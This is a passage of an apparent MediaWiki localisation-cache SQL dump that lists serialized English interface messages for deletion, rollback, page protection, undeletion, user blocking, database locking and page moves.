revision.\";'),('en','messages:enotif_lastvisited','s:45:\"See $1 for all changes since your last visit.\";'),('en','messages:enotif_lastdiff','s:27:\"See $1 to view this change.\";'),('en','messages:enotif_anon_editor','s:17:\"anonymous user $1\";'),('en','messages:enotif_body','s:692:\"Dear $WATCHINGUSERNAME,\n\n$PAGEINTRO $NEWPAGE\n\nEditor\'s summary: $PAGESUMMARY $PAGEMINOREDIT\n\nContact the editor:\nmail: $PAGEEDITOR_EMAIL\nwiki: $PAGEEDITOR_WIKI\n\nThere will be no other notifications in case of further activity unless you visit this page while logged in. You could also reset the notification flags for all your watched pages on your watchlist.\n\nYour friendly {{SITENAME}} notification system\n\n--\nTo change your email notification settings, visit\n{{canonicalurl:{{#special:Preferences}}}}\n\nTo change your watchlist settings, visit\n{{canonicalurl:{{#special:EditWatchlist}}}}\n\nTo delete the page from your watchlist, visit\n$UNWATCHURL\n\nFeedback and further assistance:\n$HELPPAGE\";'),('en','messages:created','s:7:\"created\";'),('en','messages:changed','s:7:\"changed\";'),('en','messages:deletepage','s:11:\"Delete page\";'),('en','messages:confirm','s:7:\"Confirm\";'),('en','messages:excontent','s:17:\"content was: \"$1\"\";'),('en','messages:excontentauthor','s:82:\"content was: \"$1\" (and the only contributor was \"[[Special:Contributions/$2|$2]]\")\";'),('en','messages:exbeforeblank','s:33:\"content before blanking was: \"$1\"\";'),('en','messages:delete-confirm','s:11:\"Delete \"$1\"\";'),('en','messages:delete-legend','s:6:\"Delete\";'),('en','messages:historywarning','s:114:\"Warning: The page you are about to delete has a history with $1 {{PLURAL:$1|revision|revisions}}:\";'),('en','messages:confirmdeletetext','s:230:\"You are about to delete a page along with all of its history.\nPlease confirm that you intend to do this, that you understand the consequences, and that you are doing this in accordance with [[{{MediaWiki:Policy-url}}|the policy]].\";'),('en','messages:actioncomplete','s:15:\"Action complete\";'),('en','messages:actionfailed','s:13:\"Action failed\";'),('en','messages:deletedtext','s:63:\"\"$1\" has been deleted.\nSee $2 for a record of recent deletions.\";'),('en','messages:dellogpage','s:12:\"Deletion log\";'),('en','messages:dellogpagetext','s:45:\"Below is a list of the most recent deletions.\";'),('en','messages:deletionlog','s:12:\"deletion log\";'),('en','messages:reverted','s:28:\"Reverted to earlier revision\";'),('en','messages:deletecomment','s:7:\"Reason:\";'),('en','messages:deleteotherreason','s:24:\"Other/additional reason:\";'),('en','messages:deletereasonotherlist','s:12:\"Other reason\";'),('en','messages:deletereason-dropdown','s:104:\"* Common delete reasons\n** Spam\n** Vandalism\n** Copyright violation\n** Author request\n** Broken redirect\";'),('en','messages:delete-edit-reasonlist','s:21:\"Edit deletion reasons\";'),('en','messages:delete-toobig','s:170:\"This page has a large edit history, over $1 {{PLURAL:$1|revision|revisions}}.\nDeletion of such pages has been restricted to prevent accidental disruption of {{SITENAME}}.\";'),('en','messages:delete-warning-toobig','s:160:\"This page has a large edit history, over $1 {{PLURAL:$1|revision|revisions}}.\nDeleting it may disrupt database operations of {{SITENAME}};\nproceed with caution.\";'),('en','messages:deleteprotected','s:58:\"You cannot delete this page because it has been protected.\";'),('en','messages:deleting-backlinks-warning','s:125:\"\'\'\'Warning:\'\'\' [[Special:WhatLinksHere/{{FULLPAGENAME}}|Other pages]] link to or transclude the page you are about to delete.\";'),('en','messages:rollback','s:15:\"Roll back edits\";'),('en','messages:rollback_short','s:8:\"Rollback\";'),('en','messages:rollbacklink','s:8:\"rollback\";'),('en','messages:rollbacklinkcount','s:36:\"rollback $1 {{PLURAL:$1|edit|edits}}\";'),('en','messages:rollbacklinkcount-morethan','s:46:\"rollback more than $1 {{PLURAL:$1|edit|edits}}\";'),('en','messages:rollbackfailed','s:15:\"Rollback failed\";'),('en','messages:cantrollback','s:65:\"Cannot revert edit;\nlast contributor is only author of this page.\";'),('en','messages:alreadyrolled','s:352:\"Cannot rollback last edit of [[:$1]] by [[User:$2|$2]] ([[User talk:$2|talk]]{{int:pipe-separator}}[[Special:Contributions/$2|{{int:contribslink}}]]);\nsomeone else has edited or rolled back the page already.\n\nThe last edit to the page was by [[User:$3|$3]] ([[User talk:$3|talk]]{{int:pipe-separator}}[[Special:Contributions/$3|{{int:contribslink}}]]).\";'),('en','messages:editcomment','s:31:\"The edit summary was: \"\'\'$1\'\'\".\";'),('en','messages:revertpage','s:108:\"Reverted edits by [[Special:Contributions/$2|$2]] ([[User talk:$2|talk]]) to last revision by [[User:$1|$1]]\";'),('en','messages:revertpage-nouser','s:80:\"Reverted edits by a hidden user to last revision by {{GENDER:$1|[[User:$1|$1]]}}\";'),('en','messages:rollback-success','s:58:\"Reverted edits by $1;\nchanged back to last revision by $2.\";'),('en','messages:sessionfailure-title','s:15:\"Session failure\";'),('en','messages:sessionfailure','s:192:\"There seems to be a problem with your login session;\nthis action has been canceled as a precaution against session hijacking.\nGo back to the previous page, reload that page and then try again.\";'),('en','messages:protectlogpage','s:14:\"Protection log\";'),('en','messages:protectlogtext','s:159:\"Below is a list of changes to page protections.\nSee the [[Special:ProtectedPages|protected pages list]] for the list of currently operational page protections.\";'),('en','messages:protectedarticle','s:18:\"protected \"[[$1]]\"\";'),('en','messages:modifiedarticleprotection','s:37:\"changed protection level for \"[[$1]]\"\";'),('en','messages:unprotectedarticle','s:32:\"removed protection from \"[[$1]]\"\";'),('en','messages:movedarticleprotection','s:51:\"moved protection settings from \"[[$2]]\" to \"[[$1]]\"\";'),('en','messages:protect-title','s:32:\"Change protection level for \"$1\"\";'),('en','messages:protect-title-notallowed','s:29:\"View protection level of \"$1\"\";'),('en','messages:prot_1movedto2','s:22:\"[[$1]] moved to [[$2]]\";'),('en','messages:protect-badnamespace-title','s:25:\"Non-protectable namespace\";'),('en','messages:protect-badnamespace-text','s:44:\"Pages in this namespace cannot be protected.\";'),('en','messages:protect-norestrictiontypes-text','s:74:\"This page cannot be protected as there are no restriction types available.\";'),('en','messages:protect-norestrictiontypes-title','s:20:\"Non-protectable page\";'),('en','messages:protect-legend','s:18:\"Confirm protection\";'),('en','messages:protectcomment','s:7:\"Reason:\";'),('en','messages:protectexpiry','s:8:\"Expires:\";'),('en','messages:protect_expiry_invalid','s:23:\"Expiry time is invalid.\";'),('en','messages:protect_expiry_old','s:27:\"Expiry time is in the past.\";'),('en','messages:protect-unchain-permissions','s:30:\"Unlock further protect options\";'),('en','messages:protect-text','s:83:\"Here you may view and change the protection level for the page $1.\";'),('en','messages:protect-locked-blocked','s:114:\"You cannot change protection levels while blocked.\nHere are the current settings for the page $1:\";'),('en','messages:protect-locked-dblock','s:131:\"Protection levels cannot be changed due to an active database lock.\nHere are the current settings for the page $1:\";'),('en','messages:protect-locked-access','s:135:\"Your account does not have permission to change page protection levels.\nHere are the current settings for the page $1:\";'),('en','messages:protect-cascadeon','s:234:\"This page is currently protected because it is included in the following {{PLURAL:$1|page, which has|pages, which have}} cascading protection turned on.\nChanges to this page\'s protection level will not affect the cascading protection.\";'),('en','messages:protect-default','s:15:\"Allow all users\";'),('en','messages:protect-fallback','s:37:\"Allow only users with \"$1\" permission\";'),('en','messages:protect-level-autoconfirmed','s:30:\"Allow only autoconfirmed users\";'),('en','messages:protect-level-sysop','s:25:\"Allow only administrators\";'),('en','messages:protect-summary-desc','s:12:\"[$1=$2] ($3)\";'),('en','messages:protect-summary-cascade','s:9:\"cascading\";'),('en','messages:protect-expiring','s:16:\"expires $1 (UTC)\";'),('en','messages:protect-expiring-local','s:10:\"expires $1\";'),('en','messages:protect-expiry-indefinite','s:10:\"indefinite\";'),('en','messages:protect-cascade','s:58:\"Protect pages included in this page (cascading protection)\";'),('en','messages:protect-cantedit','s:99:\"You cannot change the protection levels of this page because you do not have permission to edit it.\";'),('en','messages:protect-othertime','s:11:\"Other time:\";'),('en','messages:protect-othertime-op','s:10:\"other time\";'),('en','messages:protect-existing-expiry','s:28:\"Existing expiry time: $3, $2\";'),('en','messages:protect-existing-expiry-infinity','s:30:\"Existing expiry time: infinite\";'),('en','messages:protect-otherreason','s:24:\"Other/additional reason:\";'),('en','messages:protect-otherreason-op','s:12:\"Other reason\";'),('en','messages:protect-dropdown','s:127:\"*Common protection reasons\n** Excessive vandalism\n** Excessive spamming\n** Counter-productive edit warring\n** High traffic page\";'),('en','messages:protect-edit-reasonlist','s:23:\"Edit protection reasons\";'),('en','messages:protect-expiry-options','s:139:\"1 hour:1 hour,1 day:1 day,1 week:1 week,2 weeks:2 weeks,1 month:1 month,3 months:3 months,6 months:6 months,1 year:1 year,infinite:infinite\";'),('en','messages:restriction-type','s:11:\"Permission:\";'),('en','messages:restriction-level','s:18:\"Restriction level:\";'),('en','messages:minimum-size','s:8:\"Min size\";'),('en','messages:maximum-size','s:9:\"Max size:\";'),('en','messages:pagesize','s:7:\"(bytes)\";'),('en','messages:restriction-edit','s:4:\"Edit\";'),('en','messages:restriction-move','s:4:\"Move\";'),('en','messages:restriction-create','s:6:\"Create\";'),('en','messages:restriction-upload','s:6:\"Upload\";'),('en','messages:restriction-level-sysop','s:15:\"fully protected\";'),('en','messages:restriction-level-autoconfirmed','s:14:\"semi protected\";'),('en','messages:restriction-level-all','s:9:\"any level\";'),('en','messages:undelete','s:18:\"View deleted pages\";'),('en','messages:undelete-summary','s:0:\"\";'),('en','messages:undeletepage','s:30:\"View and restore deleted pages\";'),('en','messages:undeletepagetitle','s:75:\"The following consists of deleted revisions of [[:$1|$1]].\";'),('en','messages:viewdeletedpage','s:18:\"View deleted pages\";'),('en','messages:undeletepagetext','s:178:\"The following {{PLURAL:$1|page has been deleted but is|$1 pages have been deleted but are}} still in the archive and can be restored.\nThe archive may be periodically cleaned out.\";'),('en','messages:undelete-fieldset-title','s:17:\"Restore revisions\";'),('en','messages:undeleteextrahelp','s:282:\"To restore the page\'s entire history, leave all checkboxes deselected and click {{int:undeletebtn}}.\nTo perform a selective restoration, check the boxes corresponding to the revisions to be restored, and click {{int:undeletebtn}}.\";'),('en','messages:undeleterevisions','s:44:\"$1 {{PLURAL:$1|revision|revisions}} archived\";'),('en','messages:undeletehistory','s:198:\"If you restore the page, all revisions will be restored to the history.\nIf a new page with the same name has been created since the deletion, the restored revisions will appear in the prior history.\";'),('en','messages:undeleterevdel','s:179:\"Undeletion will not be performed if it will result in the top page or file revision being partially deleted.\nIn such cases, you must uncheck or unhide the newest deleted revision.\";'),('en','messages:undeletehistorynoadmin','s:236:\"This page has been deleted.\nThe reason for deletion is shown in the summary below, along with details of the users who had edited this page before deletion.\nThe actual text of these deleted revisions is only available to administrators.\";'),('en','messages:undelete-revision','s:47:\"Deleted revision of $1 (as of $4, at $5) by $3:\";'),('en','messages:undeleterevision-missing','s:121:\"Invalid or missing revision.\nYou may have a bad link, or the revision may have been restored or removed from the archive.\";'),('en','messages:undelete-nodiff','s:27:\"No previous revision found.\";'),('en','messages:undeletebtn','s:7:\"Restore\";'),('en','messages:undeletelink','s:12:\"view/restore\";'),('en','messages:undeleteviewlink','s:4:\"view\";'),('en','messages:undeleteinvert','s:16:\"Invert selection\";'),('en','messages:undeletecomment','s:7:\"Reason:\";'),('en','messages:undeletedrevisions','s:46:\"{{PLURAL:$1|1 revision|$1 revisions}} restored\";'),('en','messages:undeletedrevisions-files','s:80:\"{{PLURAL:$1|1 revision|$1 revisions}} and {{PLURAL:$2|1 file|$2 files}} restored\";'),('en','messages:undeletedfiles','s:38:\"{{PLURAL:$1|1 file|$1 files}} restored\";'),('en','messages:cannotundelete','s:19:\"Undelete failed:\n$1\";'),('en','messages:undeletedpage','s:137:\"$1 has been restored\n\nConsult the [[Special:Log/delete|deletion log]] for a record of recent deletions and restorations.\";'),('en','messages:undelete-header','s:71:\"See [[Special:Log/delete|the deletion log]] for recently deleted pages.\";'),('en','messages:undelete-search-title','s:20:\"Search deleted pages\";'),('en','messages:undelete-search-box','s:20:\"Search deleted pages\";'),('en','messages:undelete-search-prefix','s:25:\"Show pages starting with:\";'),('en','messages:undelete-search-submit','s:6:\"Search\";'),('en','messages:undelete-no-results','s:48:\"No matching pages found in the deletion archive.\";'),('en','messages:undelete-filename-mismatch','s:67:\"Cannot undelete file revision with timestamp $1: Filename mismatch.\";'),('en','messages:undelete-bad-store-key','s:82:\"Cannot undelete file revision with timestamp $1: File was missing before deletion.\";'),('en','messages:undelete-cleanup-error','s:40:\"Error deleting unused archive file \"$1\".\";'),('en','messages:undelete-missing-filearchive','s:107:\"Unable to restore file archive ID $1 because it is not in the database.\nIt may have already been undeleted.\";'),('en','messages:undelete-error','s:21:\"Error undeleting page\";'),('en','messages:undelete-error-short','s:25:\"Error undeleting file: $1\";'),('en','messages:undelete-error-long','s:54:\"Errors were encountered while undeleting the file:\n\n$1\";'),('en','messages:undelete-show-file-confirm','s:99:\"Are you sure you want to view the deleted revision of the file \"$1\" from $2 at $3?\";'),('en','messages:undelete-show-file-submit','s:3:\"Yes\";'),('en','messages:undelete-revision-row','s:32:\"$1 $2 ($3) $4 . . $5 $6 $7 $8 $9\";'),('en','messages:namespace','s:10:\"Namespace:\";'),('en','messages:invert','s:16:\"Invert selection\";'),('en','messages:tooltip-invert','s:111:\"Check this box to hide changes to pages within the selected namespace (and the associated namespace if checked)\";'),('en','messages:namespace_association','s:20:\"Associated namespace\";'),('en','messages:tooltip-namespace_association','s:99:\"Check this box to also include the talk or subject namespace associated with the selected namespace\";'),('en','messages:blanknamespace','s:6:\"(Main)\";'),('en','messages:contributions','s:32:\"{{GENDER:$1|User}} contributions\";'),('en','messages:contributions-summary','s:0:\"\";'),('en','messages:contributions-title','s:25:\"User contributions for $1\";'),('en','messages:mycontris','s:13:\"Contributions\";'),('en','messages:contribsub2','s:25:\"For {{GENDER:$3|$1}} ($2)\";'),('en','messages:contributions-userdoesnotexist','s:36:\"User account \"$1\" is not registered.\";'),('en','messages:nocontribs','s:46:\"No changes were found matching these criteria.\";'),('en','messages:uctop','s:9:\"(current)\";'),('en','messages:month','s:25:\"From month (and earlier):\";'),('en','messages:year','s:24:\"From year (and earlier):\";'),('en','messages:sp-contributions-newbies','s:39:\"Show contributions of new accounts only\";'),('en','messages:sp-contributions-newbies-sub','s:16:\"For new accounts\";'),('en','messages:sp-contributions-newbies-title','s:35:\"User contributions for new accounts\";'),('en','messages:sp-contributions-blocklog','s:9:\"block log\";'),('en','messages:sp-contributions-suppresslog','s:29:\"suppressed user contributions\";'),('en','messages:sp-contributions-deleted','s:26:\"deleted user contributions\";'),('en','messages:sp-contributions-uploads','s:7:\"uploads\";'),('en','messages:sp-contributions-logs','s:4:\"logs\";'),('en','messages:sp-contributions-talk','s:4:\"talk\";'),('en','messages:sp-contributions-userrights','s:22:\"user rights management\";'),('en','messages:sp-contributions-blocked-notice','s:91:\"This user is currently blocked.\nThe latest block log entry is provided below for reference:\";'),('en','messages:sp-contributions-blocked-notice-anon','s:97:\"This IP address is currently blocked.\nThe latest block log entry is provided below for reference:\";'),('en','messages:sp-contributions-search','s:24:\"Search for contributions\";'),('en','messages:sp-contributions-username','s:23:\"IP address or username:\";'),('en','messages:sp-contributions-toponly','s:41:\"Only show edits that are latest revisions\";'),('en','messages:sp-contributions-newonly','s:39:\"Only show edits that are page creations\";'),('en','messages:sp-contributions-submit','s:6:\"Search\";'),('en','messages:sp-contributions-explain','s:0:\"\";'),('en','messages:sp-contributions-footer','s:1:\"-\";'),('en','messages:sp-contributions-footer-anon','s:1:\"-\";'),('en','messages:sp-contributions-footer-newbies','s:1:\"-\";'),('en','messages:whatlinkshere','s:15:\"What links here\";'),('en','messages:whatlinkshere-title','s:23:\"Pages that link to \"$1\"\";'),('en','messages:whatlinkshere-summary','s:0:\"\";'),('en','messages:whatlinkshere-page','s:5:\"Page:\";'),('en','messages:linkshere','s:53:\"The following pages link to [[:$1]]:\";'),('en','messages:nolinkshere','s:42:\"No pages link to [[:$1]].\";'),('en','messages:nolinkshere-ns','s:66:\"No pages link to [[:$1]] in the chosen namespace.\";'),('en','messages:isredirect','s:13:\"redirect page\";'),('en','messages:istemplate','s:12:\"transclusion\";'),('en','messages:isimage','s:9:\"file link\";'),('en','messages:whatlinkshere-prev','s:34:\"{{PLURAL:$1|previous|previous $1}}\";'),('en','messages:whatlinkshere-next','s:26:\"{{PLURAL:$1|next|next $1}}\";'),('en','messages:whatlinkshere-links','s:9:\"← links\";'),('en','messages:whatlinkshere-hideredirs','s:12:\"$1 redirects\";'),('en','messages:whatlinkshere-hidetrans','s:16:\"$1 transclusions\";'),('en','messages:whatlinkshere-hidelinks','s:8:\"$1 links\";'),('en','messages:whatlinkshere-hideimages','s:13:\"$1 file links\";'),('en','messages:whatlinkshere-filters','s:7:\"Filters\";'),('en','messages:autoblockid','s:13:\"Autoblock #$1\";'),('en','messages:block','s:10:\"Block user\";'),('en','messages:unblock','s:12:\"Unblock user\";'),('en','messages:unblock-summary','s:0:\"\";'),('en','messages:blockip','s:24:\"Block {{GENDER:$1|user}}\";'),('en','messages:blockip-legend','s:10:\"Block user\";'),('en','messages:blockiptext','s:280:\"Use the form below to block write access from a specific IP address or username.\nThis should be done only to prevent vandalism, and in accordance with [[{{MediaWiki:Policy-url}}|policy]].\nFill in a specific reason below (for example, citing particular pages that were vandalized).\";'),('en','messages:ipaddressorusername','s:23:\"IP address or username:\";'),('en','messages:ipbexpiry','s:7:\"Expiry:\";'),('en','messages:ipbreason','s:7:\"Reason:\";'),('en','messages:ipbreason-dropdown','s:252:\"*Common block reasons\n** Inserting false information\n** Removing content from pages\n** Spamming links to external sites\n** Inserting nonsense/gibberish into pages\n** Intimidating behavior/harassment\n** Abusing multiple accounts\n** Unacceptable username\";'),('en','messages:ipb-hardblock','s:57:\"Prevent logged-in users from editing from this IP address\";'),('en','messages:ipbcreateaccount','s:24:\"Prevent account creation\";'),('en','messages:ipbemailban','s:31:\"Prevent user from sending email\";'),('en','messages:ipbenableautoblock','s:112:\"Automatically block the last IP address used by this user, and any subsequent IP addresses they try to edit from\";'),('en','messages:ipbsubmit','s:15:\"Block this user\";'),('en','messages:ipbother','s:11:\"Other time:\";'),('en','messages:ipboptions','s:157:\"2 hours:2 hours,1 day:1 day,3 days:3 days,1 week:1 week,2 weeks:2 weeks,1 month:1 month,3 months:3 months,6 months:6 months,1 year:1 year,indefinite:infinite\";'),('en','messages:ipbhidename','s:34:\"Hide username from edits and lists\";'),('en','messages:ipbwatchuser','s:37:\"Watch this user\'s user and talk pages\";'),('en','messages:ipb-disableusertalk','s:64:\"Prevent this user from editing their own talk page while blocked\";'),('en','messages:ipb-change-block','s:37:\"Re-block the user with these settings\";'),('en','messages:ipb-confirm','s:13:\"Confirm block\";'),('en','messages:badipaddress','s:18:\"Invalid IP address\";'),('en','messages:blockipsuccesssub','s:15:\"Block succeeded\";'),('en','messages:blockipsuccesstext','s:114:\"[[Special:Contributions/$1|$1]] has been blocked.
                                                                \nSee the [[Special:BlockList|block list]] to review blocks.\";'),('en','messages:ipb-blockingself','s:66:\"You are about to block yourself! Are you sure you want to do that?\";'),('en','messages:ipb-confirmhideuser','s:154:\"You are about to block a user with \"hide user\" enabled. This will suppress the user\'s name in all lists and log entries. Are you sure you want to do that?\";'),('en','messages:ipb-confirmaction','s:101:\"If you are sure you really want to do it, please check the \"{{int:ipb-confirm}}\" field at the bottom.\";'),('en','messages:ipb-edit-dropdown','s:18:\"Edit block reasons\";'),('en','messages:ipb-unblock-addr','s:10:\"Unblock $1\";'),('en','messages:ipb-unblock','s:32:\"Unblock a username or IP address\";'),('en','messages:ipb-blocklist','s:20:\"View existing blocks\";'),('en','messages:ipb-blocklist-contribs','s:34:\"Contributions for {{GENDER:$1|$1}}\";'),('en','messages:unblockip','s:12:\"Unblock user\";'),('en','messages:unblockiptext','s:90:\"Use the form below to restore write access to a previously blocked IP address or username.\";'),('en','messages:ipusubmit','s:17:\"Remove this block\";'),('en','messages:unblocked','s:34:\"[[User:$1|$1]] has been unblocked.\";'),('en','messages:unblocked-range','s:22:\"$1 has been unblocked.\";'),('en','messages:unblocked-id','s:26:\"Block $1 has been removed.\";'),('en','messages:unblocked-ip','s:51:\"[[Special:Contributions/$1|$1]] has been unblocked.\";'),('en','messages:blocklist','s:13:\"Blocked users\";'),('en','messages:ipblocklist','s:13:\"Blocked users\";'),('en','messages:ipblocklist-legend','s:19:\"Find a blocked user\";'),('en','messages:blocklist-userblocks','s:19:\"Hide account blocks\";'),('en','messages:blocklist-tempblocks','s:21:\"Hide temporary blocks\";'),('en','messages:blocklist-addressblocks','s:21:\"Hide single IP blocks\";'),('en','messages:blocklist-rangeblocks','s:17:\"Hide range blocks\";'),('en','messages:blocklist-timestamp','s:9:\"Timestamp\";'),('en','messages:blocklist-target','s:6:\"Target\";'),('en','messages:blocklist-expiry','s:7:\"Expires\";'),('en','messages:blocklist-by','s:14:\"Blocking admin\";'),('en','messages:blocklist-params','s:16:\"Block parameters\";'),('en','messages:blocklist-reason','s:6:\"Reason\";'),('en','messages:blocklist-summary','s:0:\"\";'),('en','messages:ipblocklist-submit','s:6:\"Search\";'),('en','messages:ipblocklist-localblock','s:11:\"Local block\";'),('en','messages:ipblocklist-otherblocks','s:32:\"Other {{PLURAL:$1|block|blocks}}\";'),('en','messages:infiniteblock','s:8:\"infinite\";'),('en','messages:expiringblock','s:19:\"expires on $1 at $2\";'),('en','messages:anononlyblock','s:10:\"anon. only\";'),('en','messages:noautoblockblock','s:18:\"autoblock disabled\";'),('en','messages:createaccountblock','s:25:\"account creation disabled\";'),('en','messages:emailblock','s:14:\"email disabled\";'),('en','messages:blocklist-nousertalk','s:25:\"cannot edit own talk page\";'),('en','messages:ipblocklist-empty','s:24:\"The block list is empty.\";'),('en','messages:ipblocklist-no-results','s:52:\"The requested IP address or username is not blocked.\";'),('en','messages:blocklink','s:5:\"block\";'),('en','messages:unblocklink','s:7:\"unblock\";'),('en','messages:change-blocklink','s:12:\"change block\";'),('en','messages:contribslink','s:8:\"contribs\";'),('en','messages:emaillink','s:10:\"send email\";'),('en','messages:autoblocker','s:119:\"Autoblocked because your IP address has been recently used by \"[[User:$1|$1]]\".\nThe reason given for $1\'s block is \"$2\"\";'),('en','messages:blocklogpage','s:9:\"Block log\";'),('en','messages:blocklog-showlog','s:85:\"This user has been blocked previously.\nThe block log is provided below for reference:\";'),('en','messages:blocklog-showsuppresslog','s:99:\"This user has been blocked and hidden previously.\nThe suppress log is provided below for reference:\";'),('en','messages:blocklogentry','s:43:\"blocked [[$1]] with an expiry time of $2 $3\";'),('en','messages:reblock-logentry','s:62:\"changed block settings for [[$1]] with an expiry time of $2 $3\";'),('en','messages:blocklogtext','s:201:\"This is a log of user blocking and unblocking actions.\nAutomatically blocked IP addresses are not listed.\nSee the [[Special:BlockList|block list]] for the list of currently operational bans and blocks.\";'),('en','messages:unblocklogentry','s:12:\"unblocked $1\";'),('en','messages:block-log-flags-anononly','s:20:\"anonymous users only\";'),('en','messages:block-log-flags-nocreate','s:25:\"account creation disabled\";'),('en','messages:block-log-flags-noautoblock','s:18:\"autoblock disabled\";'),('en','messages:block-log-flags-noemail','s:14:\"email disabled\";'),('en','messages:block-log-flags-nousertalk','s:25:\"cannot edit own talk page\";'),('en','messages:block-log-flags-angry-autoblock','s:26:\"enhanced autoblock enabled\";'),('en','messages:block-log-flags-hiddenname','s:15:\"username hidden\";'),('en','messages:range_block_disabled','s:61:\"The administrator ability to create range blocks is disabled.\";'),('en','messages:ipb_expiry_invalid','s:20:\"Expiry time invalid.\";'),('en','messages:ipb_expiry_temp','s:41:\"Hidden username blocks must be permanent.\";'),('en','messages:ipb_hide_invalid','s:82:\"Unable to suppress this account; it has more than {{PLURAL:$1|one edit|$1 edits}}.\";'),('en','messages:ipb_already_blocked','s:24:\"\"$1\" is already blocked.\";'),('en','messages:ipb-needreblock','s:58:\"$1 is already blocked. Do you want to change the settings?\";'),('en','messages:ipb-otherblocks-header','s:32:\"Other {{PLURAL:$1|block|blocks}}\";'),('en','messages:unblock-hideuser','s:64:\"You cannot unblock this user, as their username has been hidden.\";'),('en','messages:ipb_cant_unblock','s:65:\"Error: Block ID $1 not found. It may have been unblocked already.\";'),('en','messages:ipb_blocked_as_range','s:146:\"Error: The IP address $1 is not blocked directly and cannot be unblocked.\nIt is, however, blocked as part of the range $2, which can be unblocked.\";'),('en','messages:ip_range_invalid','s:17:\"Invalid IP range.\";'),('en','messages:ip_range_toolarge','s:45:\"Range blocks larger than /$1 are not allowed.\";'),('en','messages:proxyblocker','s:13:\"Proxy blocker\";'),('en','messages:proxyblockreason','s:199:\"Your IP address has been blocked because it is an open proxy.\nPlease contact your Internet service provider or technical support of your organization and inform them of this serious security problem.\";'),('en','messages:sorbs','s:5:\"DNSBL\";'),('en','messages:sorbsreason','s:77:\"Your IP address is listed as an open proxy in the DNSBL used by {{SITENAME}}.\";'),('en','messages:sorbs_create_account_reason','s:107:\"Your IP address is listed as an open proxy in the DNSBL used by {{SITENAME}}.\nYou cannot create an account.\";'),('en','messages:xffblockreason','s:158:\"An IP address present in the X-Forwarded-For header, either yours or that of a proxy server you are using, has been blocked. The original block reason was: $1\";'),('en','messages:cant-see-hidden-user','s:152:\"The user you are trying to block has already been blocked and hidden.\nSince you do not have the hideuser right, you cannot see or edit the user\'s block.\";'),('en','messages:ipbblocked','s:73:\"You cannot block or unblock other users because you are yourself blocked.\";'),('en','messages:ipbnounblockself','s:40:\"You are not allowed to unblock yourself.\";'),('en','messages:ipb-default-expiry','s:0:\"\";'),('en','messages:lockdb','s:13:\"Lock database\";'),('en','messages:unlockdb','s:15:\"Unlock database\";'),('en','messages:lockdbtext','s:294:\"Locking the database will suspend the ability of all users to edit pages, change their preferences, edit their watchlists, and other things requiring changes in the database.\nPlease confirm that this is what you intend to do, and that you will unlock the database when your maintenance is done.\";'),('en','messages:unlockdbtext','s:227:\"Unlocking the database will restore the ability of all users to edit pages, change their preferences, edit their watchlists, and other things requiring changes in the database.\nPlease confirm that this is what you intend to do.\";'),('en','messages:lockconfirm','s:40:\"Yes, I really want to lock the database.\";'),('en','messages:unlockconfirm','s:42:\"Yes, I really want to unlock the database.\";'),('en','messages:lockbtn','s:13:\"Lock database\";'),('en','messages:unlockbtn','s:15:\"Unlock database\";'),('en','messages:locknoconfirm','s:39:\"You did not check the confirmation box.\";'),('en','messages:lockdbsuccesssub','s:23:\"Database lock succeeded\";'),('en','messages:unlockdbsuccesssub','s:21:\"Database lock removed\";'),('en','messages:lockdbsuccesstext','s:120:\"The database has been locked.
                                                                \nRemember to [[Special:UnlockDB|remove the lock]] after your maintenance is complete.\";'),('en','messages:unlockdbsuccesstext','s:31:\"The database has been unlocked.\";'),('en','messages:lockfilenotwritable','s:116:\"The database lock file is not writable.\nTo lock or unlock the database, this needs to be writable by the web server.\";'),('en','messages:databasenotlocked','s:27:\"The database is not locked.\";'),('en','messages:lockedbyandtime','s:33:\"(by {{GENDER:$1|$1}} on $2 at $3)\";'),('en','messages:move-page','s:7:\"Move $1\";'),('en','messages:movepage-summary','s:0:\"\";'),('en','messages:move-page-legend','s:9:\"Move page\";'),('en','messages:movepagetext','s:904:\"Using the form below will rename a page, moving all of its history to the new name.\nThe old title will become a redirect page to the new title.\nYou can update redirects that point to the original title automatically.\nIf you choose not to, be sure to check for [[Special:DoubleRedirects|double]] or [[Special:BrokenRedirects|broken redirects]].\nYou are responsible for making sure that links continue to point where they are supposed to go.\n\nNote that the page will not be moved if there is already a page at the new title, unless the latter is a redirect and has no past edit history.\nThis means that you can rename a page back to where it was renamed from if you make a mistake, and you cannot overwrite an existing page.\n\nWarning!\nThis can be a drastic and unexpected change for a popular page;\nplease be sure you understand the consequences of this before proceeding.\";'),('en','messages:movepagetext-noredirectfixer','s:801:\"Using the form below will rename a page, moving all of its history to the new name.\nThe old title will become a redirect page to the new title.\nBe sure to check for [[Special:DoubleRedirects|double]] or [[Special:BrokenRedirects|broken redirects]].\nYou are responsible for making sure that links continue to point where they are supposed to go.\n\nNote that the page will not be moved if there is already a page at the new title, unless it is a redirect and has no past edit history.\nThis means that you can rename a page back to where it was renamed from if you make a mistake, and you cannot overwrite an existing page.\n\nWarning!\nThis can be a drastic and unexpected change for a popular page;\nplease be sure you understand the consequences of this before proceeding.\";'),('en','messages:movepagetalktext','s:258:\"The associated talk page will be automatically moved along with it unless:\n*A non-empty talk page already exists under the new name, or\n*You uncheck the box below.\n\nIn those cases, you will have to move or merge the page manually if desired.\";'),('en','messages:movearticle','s:10:\"Move page:\";'),('en','messages:moveuserpage-warning','s:148:\"Warning: You are about to move a user page. Please note that only the page will be moved and the user will not be renamed.\";'),('en','messages:movecategorypage-warning','s:196:\"Warning: You are about to move a category page. Please note that only the page will be moved and any pages in the old category will not be recategorized into the new one.\";'),('en','messages:movenologintext','s:81:\"You must be a registered user and [[Special:UserLogin|logged in]] to move a page.\";'),('en','messages:movenotallowed','s:41:\"You do not have permission to move pages.\";'),('en','messages:movenotallowedfile','s:41:\"You do not have permission to move files.\";'),('en','messages:cant-move-user-page','s:68:\"You do not have permission to move user pages (apart from subpages).\";'),('en','messages:cant-move-to-user-page','s:84:\"You do not have permission to move a page to a user page (except to a user subpage).\";'),('en','messages:cant-move-category-page','s:50:\"You do not have permission to move category pages.\";'),('en','messages:cant-move-to-category-page','s:61:\"You do not have permission to move a page to a category page.\";'),('en','messages:newtitle','s:13:\"To new title:\";'),('en','messages:move-watch','s:33:\"Watch source page and target page\";'),('en','messages:movepagebtn','s:9:\"Move page\";'),('en','messages:pagemovedsub','s:14:\"Move succeeded\";'),('en','messages:movepage-moved','s:44:\"\"$1\" has been moved to \"$2\"\";'),('en','messages:movepage-moved-redirect','s:28:\"A redirect has been created.\";'),('en','messages:movepage-moved-noredirect','s:47:\"The creation of a redirect has been suppressed.\";'),('en','messages:articleexists','s:105:\"A page of that name already exists, or the name you have chosen is not valid.\nPlease 